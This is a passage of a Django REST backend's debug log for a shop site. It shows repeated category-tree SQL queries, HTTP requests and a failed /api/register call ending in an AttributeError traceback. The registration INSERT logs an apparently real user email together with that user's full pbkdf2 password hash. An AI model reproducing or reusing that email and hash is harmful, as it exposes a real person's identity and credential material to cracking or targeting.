= 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:44:53,847 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:44:53,851 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:44:53,855 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:44:53,859 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:44:53,865 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:44:53,869 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:44:53,873 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:44:53,877 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:44:53,881 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:44:53,887 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:44:53,891 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:44:53,895 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:44:53,899 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-29 19:44:53,903 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-29 19:44:53,909 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-29 19:44:53,913 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-29 19:44:53,917 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-29 19:44:53,921 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-29 19:44:53,925 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-29 19:44:53,929 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-29 19:44:53,935 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-29 19:44:53,939 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-29 19:44:53,943 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-29 19:44:53,947 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-29 19:44:53,951 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-29 19:44:53,957 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-29 19:44:53,961 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-29 19:44:53,965 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-29 19:44:53,969 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-29 19:44:53,974 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-29 19:44:53,981 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-29 19:44:53,985 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-29 19:44:53,989 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-29 19:44:53,993 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-29 19:44:53,997 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-29 19:44:54,001 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-29 19:44:54,006 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-29 19:44:54,010 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-29 19:44:54,014 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-29 19:44:54,019 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-29 19:44:54,023 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [29/Dec/2019 19:44:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [29/Dec/2019 19:44:54] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [29/Dec/2019 19:44:54] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [29/Dec/2019 19:45:26] "OPTIONS /api/register HTTP/1.0" 200 187 DEBUG 2019-12-29 19:45:27,084 utils 2749 140297243715328 (0.004) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'cisco@rebellionvfx.com' LIMIT 1; args=('cisco@rebellionvfx.com',) DEBUG 2019-12-29 19:45:27,085 utils 2749 140297243715328 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'cisco@rebellionvfx.com' LIMIT 1; args=('cisco@rebellionvfx.com',) DEBUG 2019-12-29 19:45:27,319 utils 2749 140297243715328 (0.004) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$uWc6kbBjxrvR$KQhGXv+y62Y1UKTkhQcOh27KDvcZ73Fqy8NpJAi9VGs=', NULL, false, 'cisco@rebellionvfx.com', '', '', 'cisco@rebellionvfx.com', false, true, '2019-12-29T19:45:27.092120+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$uWc6kbBjxrvR$KQhGXv+y62Y1UKTkhQcOh27KDvcZ73Fqy8NpJAi9VGs=', None, False, 'cisco@rebellionvfx.com', '', '', 'cisco@rebellionvfx.com', False, True, datetime.datetime(2019, 12, 29, 19, 45, 27, 92120, tzinfo=)) DEBUG 2019-12-29 19:45:27,349 utils 2749 140297243715328 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" LIMIT 21; args=() DEBUG 2019-12-29 19:45:27,351 utils 2749 140297243715328 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" LIMIT 21; args=() Internal Server Error: /api/register Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/csrf.py", line 54, in wrapped_view return view_func(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/generic/base.py", line 71, in view return self.dispatch(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/rest_framework/views.py", line 505, in dispatch response = self.handle_exception(exc) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/rest_framework/views.py", line 465, in handle_exception self.raise_uncaught_exception(exc) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/rest_framework/views.py", line 476, in raise_uncaught_exception raise exc File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/rest_framework/views.py", line 502, in dispatch response = handler(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/accounts/views.py", line 24, in post token = Token.objects.create(user=user) AttributeError: type object 'Token' has no attribute 'objects' [29/Dec/2019 19:45:27] "POST /api/register HTTP/1.0" 500 16745 DEBUG 2019-12-29 19:45:41,182 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-29 19:45:41,189 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-29 19:45:41,193 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-29 19:45:41,195 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-29 19:45:41,198 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-29 19:45:41,201 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-29 19:45:41,203 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-29 19:45:41,205 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-29 19:45:41,208 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-29 19:45:41,211 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-29 19:45:41,213 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-29 19:45:41,216 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-29 19:45:41,218 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-29 19:45:41,220 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-29 19:45:41,224 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-29 19:45:41,226 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-29 19:45:41,228 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-29 19:45:41,230 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", 